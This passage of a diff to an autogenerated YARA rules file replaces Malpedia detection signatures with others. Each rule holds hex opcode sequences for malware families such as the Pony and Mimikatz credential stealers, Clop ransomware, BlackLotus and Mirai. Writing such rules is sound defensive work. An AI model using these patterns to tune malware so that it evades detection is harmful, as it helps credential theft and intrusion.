8d8c2414010000 68???????? 51 eb0d 8d942414010000 } + $sequence_6 = { 8b442424 50 56 ff15???????? 56 ff15???????? 83f8ff } + $sequence_7 = { 7cd0 8b461c 8bce 50 e8???????? 8b7e1c } + $sequence_8 = { 51 8bfb 83c9ff 33c0 895514 f2ae f7d1 } + $sequence_9 = { 83c408 85ff 742b 57 ff15???????? 83f816 7e1f } condition: - 7 of them and filesize <1449984 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Hui_Loader_Auto : FILE +rule MALPEDIA_Win_Pony_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "175084ea-2a45-5f42-bda4-3cc233036dd9" + id = "d90fd047-9438-55a9-9e35-1d6c2ea6d18d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hui_loader_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pony_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "96ca3a225904ad2e70a598c1b3c7fa88d26822a60a6742e1663517bed35c0526" + logic_hash = "8fcd4026be1a9e152c2bd589ec65b90e934cc06d61e86dd6cd06c58ac6d41a1e" score = 75 quality = 75 tags = "FILE" @@ -156742,34 +159428,34 @@ rule MALPEDIA_Win_Hui_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 51 8bf8 ffd5 8d9424b8010000 8d842488090000 } - $sequence_1 = { ffd0 68e8030000 ffd6 8b0d???????? 51 ff15???????? 5f } - $sequence_2 = { 8b1402 3bd3 7406 c70109000000 } - $sequence_3 = { 83e01f c1f905 8d04c0 8b0c8d60e20010 8d44810c 50 } - $sequence_4 = { 52 50 a3???????? ff15???????? a1???????? } - $sequence_5 = { 83c628 83f90a 7cd9 33d2 } - $sequence_6 = { 8d4a01 0338 83c004 49 75f8 42 83c628 } - $sequence_7 = { c20400 8b15???????? 33c0 68???????? 52 } - $sequence_8 = { ff15???????? a3???????? 33ff 8d4c2428 } - $sequence_9 = { 7e0f 8b4efc 8b5401fc 031401 8b0e 891401 } + $sequence_0 = { c20400 55 89e5 83ec18 53 } + $sequence_1 = { c745f400000000 8d45f8 50 ff7508 6a00 ff15???????? } + $sequence_2 = { bfffffffff 33f9 0bf8 33fb 8d941792cc0c8f 03560c } + $sequence_3 = { ff75e8 ff7508 e8???????? 23d8 ff75ec e8???????? } + $sequence_4 = { f7d0 50 ff7508 e8???????? c9 c20400 } + $sequence_5 = { ff7514 e8???????? eb0d 68???????? } + $sequence_6 = { c9 c20400 55 8bec 83c4fc ff7514 ff7510 } + $sequence_7 = { ff75c8 e8???????? ff75c4 e8???????? ff75bc } + $sequence_8 = { b9ffffffff f2ae 3807 75c5 6a1a ff7508 } + $sequence_9 = { e8???????? ff7510 6a18 ff7508 e8???????? ff7510 } condition: - 7 of them and filesize <131072 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Badnews_Auto : FILE +rule MALPEDIA_Win_Starcruft_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "82b67459-b37a-5597-851f-c5e10ae625fd" + id = "1dcafb43-c4d2-514a-8438-617d875e41e7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badnews_auto.yar#L1-L214" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.starcruft_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "bc13ea27737db6028c742e92e044e676e8322f3710d6ba3506e9723f27d2a819" + logic_hash = "ba9170fb6918e14feeea6fab09146b237b88c2d2d12a4f68164b770922d2ddd1" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -156781,44 +159467,32 @@ rule MALPEDIA_Win_Badnews_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 83c404 68???????? 6804010000 ff15???????? } - $sequence_1 = { c78534ffffff47657457 c78538ffffff696e646f c7853cffffff77546578 66c78540ffffff7457 } - $sequence_2 = { c705????????55736572 c705????????33322e64 66c705????????6c6c c605????????00 } - $sequence_3 = { eb02 33c9 c0e004 02c1 3423 c0c003 } - $sequence_4 = { 8945fc 53 56 57 8d8534ffffff } - $sequence_5 = { 55 8bec 8b450c 3d01020000 } - $sequence_6 = { d1f9 68???????? 03c9 51 } - $sequence_7 = { 68???????? 6a1a 68???????? 57 } - $sequence_8 = { 6a02 68???????? 50 a3???????? } - $sequence_9 = { 8bf0 56 ff15???????? 50 6a40 } - $sequence_10 = { 56 ffd3 85c0 7403 83c608 8a06 } - $sequence_11 = { 57 6a00 6880000000 6a04 6a00 6a01 6a04 } - $sequence_12 = { ff15???????? 85c0 7405 83c004 } - $sequence_13 = { 68???????? ff15???????? b8???????? 83c424 8d5002 668b08 } - $sequence_14 = { e8???????? 68???????? 8d45f4 c745f4682f0110 50 e8???????? cc } - $sequence_15 = { 83e61f c1f805 c1e606 c1e910 c0e107 8b1485d0a70110 } - $sequence_16 = { 8d8d54ffffff 8d5101 90 8a01 } - $sequence_17 = { 7414 8bc2 c1f805 83e21f c1e206 031485d0a70110 } - $sequence_18 = { 8b048dd0a70110 4e 807d1300 8955e4 c64418050a } - $sequence_19 = { 58 668986b8000000 668986be010000 c7466848960110 } - $sequence_20 = { 2bc2 8bf0 d1fe 6a55 ff34f5e0470110 ff7508 e8???????? } - $sequence_21 = { 41 84c0 75f9 2bce 741c 804415ec03 } + $sequence_0 = { 83bd34fbffff00 7458 0fb64d34 85c9 7419 8b95b4fcffff 899558fbffff } + $sequence_1 = { ebbd c7852cfeffff01000000 83bd2cfeffff00 7565 8b4508 898524feffff c78520feffff00000000 } + $sequence_2 = { 884def 8b55f0 83c202 8955f0 8b45f0 8945f8 eb09 } + $sequence_3 = { 8b55f8 8b85ccfeffff 8b0c90 0fb711 85d2 740b 8b45f8 } + $sequence_4 = { 55 8bec 81ec20010000 a1???????? 33c5 8945e4 8b4508 } + $sequence_5 = { c685cafcffff26 c685cbfcffffa1 c685ccfcffff8b c685cdfcffff52 c685cefcffff6c c685cffcffffba c685d0fcffffde } + $sequence_6 = { 8b4dd4 8908 8b5510 8b02 50 8d4dd8 51 } + $sequence_7 = { 8b4dcc 51 e8???????? 83c404 8945f0 8955f4 8b55d0 } + $sequence_8 = { e8???????? 83c404 33c0 e9???????? 8b45fc } + $sequence_9 = { e8???????? e8???????? c705????????04c02e00 c705????????08c02e00 c705????????0cc12e00 c705????????10c12e00 } condition: - 7 of them and filesize <612352 + 7 of them and filesize <294912 } -rule MALPEDIA_Win_Biscuit_Auto : FILE +rule MALPEDIA_Win_Sasfis_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cbdd41f1-3e24-52e8-913d-0c21f28eadad" + id = "5e363129-1d9b-5d5a-8006-da18dff7062a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.biscuit_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sasfis_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "c4b7181ffb74601ad4f6fe9643262fda887ff950b5291eeca17cee75a1b1c812" + logic_hash = "7eee2ccd93eb9390961368e951e0384a076b29fc7a953a6afc5b8df0aa798b71" score = 75 quality = 75 tags = "FILE" @@ -156832,34 +159506,34 @@ rule MALPEDIA_Win_Biscuit_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? a1???????? 898588feffff 83bd88feffff00 0f85bb010000 bf???????? } - $sequence_1 = { 84c0 894b04 0f84e8feffff 8b542418 52 } - $sequence_2 = { 8a54040c 40 f6d2 8854040b 3bc1 } - $sequence_3 = { eb04 8b7c2424 8b4604 53 53 53 } - $sequence_4 = { e9???????? 8b4de4 bf???????? 33c0 8d9980000000 83c9ff f2ae } - $sequence_5 = { f2ae f7d1 49 3bd1 731f 8b7de0 8a0c1a } - $sequence_6 = { 740e 68???????? 57 e8???????? 83c408 f60610 } - $sequence_7 = { 899538feffff 83bd38feffff00 7511 8b85ccfeffff 2b45e4 8985c0feffff } - $sequence_8 = { c1e902 f3a5 8bc8 83e103 f3a4 68c8000000 ff15???????? } - $sequence_9 = { 8bcb e8???????? 84c0 7426 8b7b04 8bcd 8bd1 } + $sequence_0 = { 8433 a6 0d60ca8b0c 646b1a5c } + $sequence_1 = { d7 4b 7ca9 bc74460651 130d???????? 37 d502 } + $sequence_2 = { 157e2808b7 0016 2038 2410 } + $sequence_3 = { 60 0c1c 0430 00242c 1838 3c00 3808 } + $sequence_4 = { 84df 66ffc5 8b742448 66f7df } + $sequence_5 = { f9 f6c77d 660fbae10b 83c504 } + $sequence_6 = { 657326 6e 346f 6f 68432b3501 } + $sequence_7 = { 6681cf5b01 81ec9c000000 57 60 5f } + $sequence_8 = { 2909 26df6883 95 7800 e8???????? 15afb28a60 38342c } + $sequence_9 = { 260c16 005220 0410 1400 } condition: - 7 of them and filesize <180224 + 7 of them and filesize <8060928 } -rule MALPEDIA_Win_Graphdrop_Auto : FILE +rule MALPEDIA_Win_Clop_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9b2ea7f1-3511-52b3-a5e3-7dff660f4219" + id = "59cb28c0-0028-51c2-94ee-931d5b6fa068" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.graphdrop_auto.yar#L1-L112" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.clop_auto.yar#L1-L188" license_url = "N/A" - logic_hash = "f69680c5241d19c09af86db48aaa89e34bb562d83e95c226a91b7e2e978f1c7f" + logic_hash = "f2736024915a6a0ca98a26d3016fbd37034bb9a8e1a0f37004991cc314f844e2" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -156871,32 +159545,41 @@ rule MALPEDIA_Win_Graphdrop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4154 90 415c 90 } - $sequence_1 = { 4155 49c7c501000000 4150 4152 415a } - $sequence_2 = { 52 0f77 90 5a } - $sequence_3 = { 0f77 0f77 5b 0f77 } - $sequence_4 = { 49c7c501000000 4150 4152 415a 4158 } - $sequence_5 = { 52 50 58 5a 49ffc9 } - $sequence_6 = { 49c7c501000000 4150 4152 415a 4158 49ffcd } - $sequence_7 = { 4150 4152 415a 4158 } - $sequence_8 = { 4155 49c7c501000000 4150 4152 415a 4158 49ffcd } - $sequence_9 = { 4152 415a 4158 49ffcd } + $sequence_0 = { 83c40c 6860070000 6a40 ff15???????? } + $sequence_1 = { 6a04 6800300000 6887000000 6a00 } + $sequence_2 = { ff15???????? 56 53 8bf8 ff15???????? 8bf0 56 } + $sequence_3 = { 57 6a00 ff15???????? 68???????? 8bd8 } + $sequence_4 = { ff15???????? 8bf0 56 53 ff15???????? 50 } + $sequence_5 = { 6683e07f 6683f87f 8d642408 0f85fd0b0000 eb00 f30f7e442404 660f2815???????? } + $sequence_6 = { 50 ff15???????? 83c40c 6860070000 } + $sequence_7 = { ffd0 c3 8bff 55 8bec 83ec1c 8d4de4 } + $sequence_8 = { 0f85aa010000 68???????? 8d442450 50 } + $sequence_9 = { 8be5 5d c20400 56 ff15???????? 6a00 } + $sequence_10 = { 8d85bcefffff 50 ff15???????? 68???????? } + $sequence_11 = { 68???????? 68???????? e8???????? 83c424 6aff } + $sequence_12 = { 6888130000 ffd7 6a00 6a00 6a00 68???????? } + $sequence_13 = { ff15???????? 68???????? 8d85dcf7ffff 50 } + $sequence_14 = { 83c408 6aff ff15???????? 33c0 } + $sequence_15 = { 83c40c 33f6 85ff 7428 } + $sequence_16 = { 83c424 53 50 ffd6 } + $sequence_17 = { 6aff ffd7 8b4dfc 33c0 5f } + $sequence_18 = { 8d8424dc0b0000 50 ffd6 85c0 751a 68???????? 8d8424dc0b0000 } condition: - 7 of them and filesize <4186112 + 7 of them and filesize <796672 } -rule MALPEDIA_Win_Romeos_Auto : FILE +rule MALPEDIA_Win_Skip20_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0156645c-05e4-5c43-9143-7d272fa7b808" + id = "82237026-0542-5063-b5ce-819de193cfa5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.romeos_auto.yar#L1-L178" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.skip20_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "c5549ec98f2ed02ef2ebca3bfe2dbd57b9e8c34679be2e9e834dd93b596fc1fe" + logic_hash = "21de0ff5fbd1c6f42d6edbb2c240ff9a5cc9d69d730f1c14e8fabd969797a013" score = 75 quality = 75 tags = "FILE" @@ -156910,38 +159593,32 @@ rule MALPEDIA_Win_Romeos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 750a 5e 33c0 5b 83c408 c20c00 8b06 } - $sequence_1 = { bd30000000 33db 85ed 7e0e e8???????? 88441c18 43 } - $sequence_2 = { 6a16 8d4c244c 6800200000 51 57 } - $sequence_3 = { 83ec08 53 56 8b742418 8bd9 85f6 750a } - $sequence_4 = { 5f 5e 5d 5b 81c438200000 c20400 } - $sequence_5 = { 8b542408 668902 b001 c3 668b4801 40 51 } - $sequence_6 = { 85db 751d 807c244802 0f85e0000000 8d542414 8d442448 } - $sequence_7 = { 6a16 8d44244c 52 50 } - $sequence_8 = { 68bb010000 8b39 50 ff15???????? 8b8e20030000 50 53 } - $sequence_9 = { e8???????? 8bf0 eb02 33f6 53 6800040000 8d4c243c } - $sequence_10 = { 50 8bce e8???????? 8d8c2490010000 51 } - $sequence_11 = { 81c428010000 c3 5f 5e 5d 83c8ff 5b } - $sequence_12 = { 8bf1 57 b940000000 33c0 8d7c2415 c644241400 c744240800000000 } - $sequence_13 = { 895c2440 895c2434 895c2438 ff15???????? } - $sequence_14 = { 8b442410 85c0 7408 66837c241400 7510 47 } - $sequence_15 = { 8b3a eb0d 8b8e20030000 68bb010000 } + $sequence_0 = { 85c9 7448 ffc9 7432 ffc9 0f85150a0000 } + $sequence_1 = { 782e 3b0d???????? 7326 4863c9 488d1504fe0400 488bc1 } + $sequence_2 = { 0fb74c247a 0fb7542478 89442438 894c2430 89542428 488d15e62f0100 } + $sequence_3 = { 741c 3d00010000 740e 3d00020000 7536 4180493347 eb2f } + $sequence_4 = { e9???????? 4883bc24e000000000 7409 83fa01 0f842cf9ffff 83fa05 } + $sequence_5 = { 488db424ec000000 0f1f00 413bfc 732a 448b06 8bd7 } + $sequence_6 = { 418bb482a08a0100 eb07 4c8d15b4b2ffff 8bd6 81e200004000 747e 41ff4c2418 } + $sequence_7 = { 488d3d071f0500 ba58000000 488bcd e8???????? 4885c0 7468 } + $sequence_8 = { 89542428 488d15652f0100 440fb7442470 440fb74c2472 440fb7542476 4489542420 488d0db72f0100 } + $sequence_9 = { 89442438 0fb74c247a 894c2430 0fb7542478 89542428 488d15ae290100 } condition: - 7 of them and filesize <294912 + 7 of them and filesize <794624 } -rule MALPEDIA_Win_Vohuk_Auto : FILE +rule MALPEDIA_Win_Blacklotus_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "411a3e2f-1751-5273-acfa-62305bd7fa2f" + id = "84ef9a0b-6544-5450-8b66-292ec2ba5dbd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vohuk" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vohuk_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blacklotus_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "2ed67cd931d1a068f4ca262bb4544ee71becc9ba564d979b0f2e30b12b56f8a3" + logic_hash = "94ccc2d7ff61cb6463b78893aadb2549c584433629bcbab33ca8298790f40cde" score = 75 quality = 75 tags = "FILE" @@ -156955,32 +159632,32 @@ rule MALPEDIA_Win_Vohuk_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff35???????? 8d45ba 50 e8???????? 83c408 e9???????? c745b48f00a000 } - $sequence_1 = { e8???????? c7451850000000 837d1800 7e20 33c9 8a840df4f9ffff 8d4901 } - $sequence_2 = { 50 ff15???????? a3???????? 33f6 b818000000 c745b245007d00 c745b666006300 } - $sequence_3 = { a3???????? c745b6b700b400 c745bab100fb00 c745be82009e00 c745c2f800f400 c745c6e400fb00 c745caf900b100 } - $sequence_4 = { 8b0d???????? bac1655634 8b75f8 6892000000 e8???????? 8d4d94 51 } - $sequence_5 = { 33c9 8d4900 8a840d48e6ffff 8d4901 88840d57ffffff 8b45fc 48 } - $sequence_6 = { 85c0 7413 8b4b14 c6431c00 e8???????? 5f 5e } - $sequence_7 = { 88840d57ffffff 8b45fc 48 8945fc 837dfc00 7fe2 8d85d8fcffff } - $sequence_8 = { 8d45f2 803d????????01 8945dc 8d45ea 7403 } - $sequence_9 = { c5fe6f4580 c4e37d4645a031 c5fe7f8080000000 c5fe6f85e0feffff c4e37d468500ffffff31 c5fe7f80a0000000 } + $sequence_0 = { 443bca 7319 69c03f000100 4883c102 4103c0 41ffc1 440fb701 } + $sequence_1 = { c745cfc1afbd03 c745d301138a6b c745d73a911141 c745db4f67dcea c745df97f2cfce } + $sequence_2 = { 448bc6 488d155b1d0000 488bcb e8???????? 488bf0 } + $sequence_3 = { 770b 418b4908 03ca 413bcb 770e 6641ffc2 4983c128 } + $sequence_4 = { 42883c10 4183fb3c 0f8c45ffffff 498d8af0000000 41b810000000 498bd6 } + $sequence_5 = { 488d1588f7ffff e8???????? 488b05???????? 488bcb ff5020 488b5c2430 488b742438 } + $sequence_6 = { 4632440c30 eb1b 418af1 83f804 } + $sequence_7 = { 4889442428 4c8bc5 488bd3 48897c2420 } + $sequence_8 = { 740b 4883c602 483bf7 72bd eb0c bb03000000 eb05 } + $sequence_9 = { 48897010 48897818 4c897020 55 488d68c8 4881ec30010000 4c8bd1 } condition: - 7 of them and filesize <260096 + 7 of them and filesize <181248 } -rule MALPEDIA_Win_Mimikatz_Auto : FILE +rule MALPEDIA_Win_Maktub_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d4a7b901-d580-5f27-9943-deb2fd01403a" + id = "e3bef5b1-ffc5-599d-9917-312a2370b890" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mimikatz_auto.yar#L1-L208" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maktub_auto.yar#L1-L203" license_url = "N/A" - logic_hash = "545bdfd9bb109ef6aa7c579d3c8a6e0e694cb1fac0a4b134cb9c66bf853a0582" + logic_hash = "e077a57d767e9de98d639131f563ec23078961a903d866aaf47969e99e6c3d2f" score = 75 quality = 73 tags = "FILE" @@ -156994,44 +159671,44 @@ rule MALPEDIA_Win_Mimikatz_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7f1 85d2 7406 2bca } - $sequence_1 = { 83f8ff 750e ff15???????? c7002a000000 } - $sequence_2 = { c3 81f998000000 7410 81f996000000 7408 } - $sequence_3 = { e8???????? 894720 85c0 7413 } - $sequence_4 = { f30f6f4928 f30f7f8c24a0000000 f30f6f4138 f30f7f8424b8000000 } - $sequence_5 = { 83f812 72f1 33c0 c3 } - $sequence_6 = { ff5028 8be8 85c0 787a } - $sequence_7 = { 66894108 33c0 39410c 740b } - $sequence_8 = { eb0c bfdfff0000 6623fe 6683ef07 8b742474 } - $sequence_9 = { 6683f83f 7607 32c0 e9???????? } - $sequence_10 = { 2bc1 85c9 7403 83c008 d1e8 8d441002 } - $sequence_11 = { ff15???????? b940000000 8bd0 89442430 } - $sequence_12 = { 3c02 7207 e8???????? eb10 } - $sequence_13 = { ff15???????? b9e9fd0000 8905???????? ff15???????? } - $sequence_14 = { 8d04f530d94600 8938 68a00f0000 ff30 83c718 ff15???????? 85c0 } - $sequence_15 = { 837e1800 7402 ffd0 e8???????? 53 } - $sequence_16 = { 57 33ff ffb750da4600 ff15???????? 898750da4600 83c704 } - $sequence_17 = { e8???????? 8d04453cdb4600 8bc8 2bce 6a03 d1f9 68???????? } - $sequence_18 = { a1???????? a3???????? a1???????? c705????????cf2f4000 8935???????? } - $sequence_19 = { 8888a0d44600 40 ebe6 ff35???????? ff15???????? } - $sequence_20 = { 8a80a4d54600 08443b1d 0fb64601 47 3bf8 76ea 8b7d08 } - $sequence_21 = { 43 83c408 83fb04 7cdc 8b5df8 8ad3 } + $sequence_0 = { ffd0 f7d8 1bc0 f7d8 8be5 } + $sequence_1 = { c7450c00000000 50 6a01 56 } + $sequence_2 = { ff30 8b86a4000000 ffd0 8b75b4 } + $sequence_3 = { ff30 8b83a4000000 ffd0 8b75d4 } + $sequence_4 = { ff7508 ffd7 50 ffd6 53 8b5d08 6af4 } + $sequence_5 = { ff30 8b8690000000 6a00 ffd0 } + $sequence_6 = { ff30 8b4704 6a00 56 ffd0 85c0 } + $sequence_7 = { c74508???????? e9???????? 50 ff15???????? 85c0 7f1e a1???????? } + $sequence_8 = { ff7004 ff30 e8???????? 8bc7 5f 5e } + $sequence_9 = { f8 39dc f5 f7de } + $sequence_10 = { f8 57 c64424084b 88442404 } + $sequence_11 = { f8 60 0145e0 f8 } + $sequence_12 = { f8 50 55 660fa3d5 } + $sequence_13 = { 8d4f0c e8???????? 8d4de8 e8???????? } + $sequence_14 = { 8d4f04 8b01 ff7508 ff5010 8bd8 } + $sequence_15 = { f8 3a07 6868c51b01 8d7f01 } + $sequence_16 = { 8d4f04 8b45f4 8b31 2bc2 } + $sequence_17 = { 8d4f04 e8???????? 8d5608 8d4f08 } + $sequence_18 = { 8d4f08 e8???????? 8d560c 8d4f0c e8???????? } + $sequence_19 = { 8d4f0c e8???????? 5f 5e 5d c20400 } + $sequence_20 = { f8 12644a00 40 d4b5 } + $sequence_21 = { 8d4f10 50 e8???????? 8d45f8 } condition: - 7 of them and filesize <1642496 + 7 of them and filesize <3063808 } -rule MALPEDIA_Win_Oni_Auto : FILE +rule MALPEDIA_Elf_Mirai_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ffe7d6a1-e7f2-579d-b056-7e9412d8f38a" + id = "99bf67bb-d881-5d1d-9ccf-8805d4c126fc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oni_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/elf.mirai_auto.yar#L1-L92" license_url = "N/A" - logic_hash = "ef51460421d5bc54251bcf8ac5edcdde6a15b31e2116a2189b470d64d9b9ae34" + logic_hash = "53d684afadf5b7afddedfe71964fc5273146fef2945717259a3274aa2e1d04ee" score = 75 quality = 75 tags = "FILE" @@ -157045,32 +159722,30 @@ rule MALPEDIA_Win_Oni_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8d4db0 c645b000 e8???????? 8b0d???????? b8abaaaa2a 8b3d???????? } - $sequence_1 = { 83f904 0f828d000000 83f923 0f8789000000 8bc8 } - $sequence_2 = { ff75ec 51 ff36 8b55e8 8bcb e8???????? 83c410 } - $sequence_3 = { 7f07 3bc7 0f4fd8 8bfb 6aff 8d4701 } - $sequence_4 = { 3a45ec 753e 8b45f0 8b048590884300 } - $sequence_5 = { 8d0dc0254300 ba1b000000 e9???????? a900000080 } - $sequence_6 = { 660fd685c8feffff 33ff 6800010000 899dc8feffff 89bdccfeffff 899dd0feffff ff15???????? } - $sequence_7 = { 8901 0fb602 5f 5e 5b 8b4c2430 33cc } - $sequence_8 = { 8b542428 8b442414 85f6 0f8422ffffff } - $sequence_9 = { f6c104 7519 f6c102 8d4df8 7540 eb6a } + $sequence_0 = { 6689432a e8???????? c7433400000000 894330 } + $sequence_1 = { 89d0 c1e005 01d0 89ca } + $sequence_2 = { 894330 c6433801 c6433903 c6433a03 c6433b06 } + $sequence_3 = { 66c1e808 d0e8 8d04c0 28c2 } + $sequence_4 = { 3c19 7705 8d42e0 8801 } + $sequence_5 = { 807c242b00 66894304 7406 66c743064000 c643092f } + $sequence_6 = { 66894104 7406 66c741064000 c6410911 } + $sequence_7 = { 8b1408 895310 8b54080c 66895314 } condition: - 7 of them and filesize <499712 + 7 of them and filesize <2228224 } -rule MALPEDIA_Win_Collectorgoomba_Auto : FILE +rule MALPEDIA_Win_Starsypound_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ee60f6dc-0e40-5600-9363-18addef799db" + id = "70e37162-3a73-596a-8d7d-42b9d85b78f7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.collectorgoomba_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.starsypound_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "b5a8ed8c5e59ef8c9c917b7f2556669b4a98ddcbc5ddbd63af8e98206da01974" + logic_hash = "abf4ae91c4287e1227ba24bd55f61dc3c1250c1b8b21f760166157e29806933f" score = 75 quality = 75 tags = "FILE" @@ -157084,32 +159759,32 @@ rule MALPEDIA_Win_Collectorgoomba_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb91 8b450c 833801 7e04 834dfcff 837dfc00 7c1c } - $sequence_1 = { 8b8084000000 8945fc 837dfc00 756e 8b4508 83787c00 7465 } - $sequence_2 = { ff30 ff75f8 ff75fc ff7508 e8???????? 83c410 8b4508 } - $sequence_3 = { 83c007 894588 ff758c ff7588 8d8528fdffff 50 8d4dc4 } - $sequence_4 = { ffb574ffffff e8???????? 59 59 8845e6 8a45e6 8845e5 } - $sequence_5 = { c705????????020a010d c705????????04050f01 833d????????00 740a c705????????04060b08 c705????????0206030b c705????????08050a0e } - $sequence_6 = { ff704c 8b4508 ff30 e8???????? 59 59 8945d4 } - $sequence_7 = { e8???????? 83c40c ebd1 33c0 40 c1e005 c64405d000 } - $sequence_8 = { ff75fc e8???????? 59 59 ebad ff75d0 6a00 } - $sequence_9 = { 8bec 83ec10 8b4508 8945f0 8b45f0 8b8018010000 8945f4 } + $sequence_0 = { ff15???????? 8dbc2458010000 83c9ff 33c0 } + $sequence_1 = { 68???????? 52 e8???????? 83c420 85c0 7444 8b5304 } + $sequence_2 = { 53 56 57 6a18 e8???????? 8bb42424040000 } + $sequence_3 = { 8d4c2428 68???????? 51 e8???????? 56 8d542434 } + $sequence_4 = { 8bfd 8d44240c f3a5 8b5500 8b3d???????? 6a00 } + $sequence_5 = { 885c3438 c744241804010000 ff15???????? 8dbc2458010000 83c9ff 33c0 } + $sequence_6 = { 50 8d4c2424 56 51 52 } + $sequence_7 = { f3a4 885c0444 bf???????? 83c9ff 33c0 33f6 } + $sequence_8 = { 83c40c 85c0 7e2b eb08 } + $sequence_9 = { e8???????? 68c0270900 ff15???????? e8???????? 5f } condition: - 7 of them and filesize <1400832 + 7 of them and filesize <40960 } -rule MALPEDIA_Win_Matsnu_Auto : FILE +rule 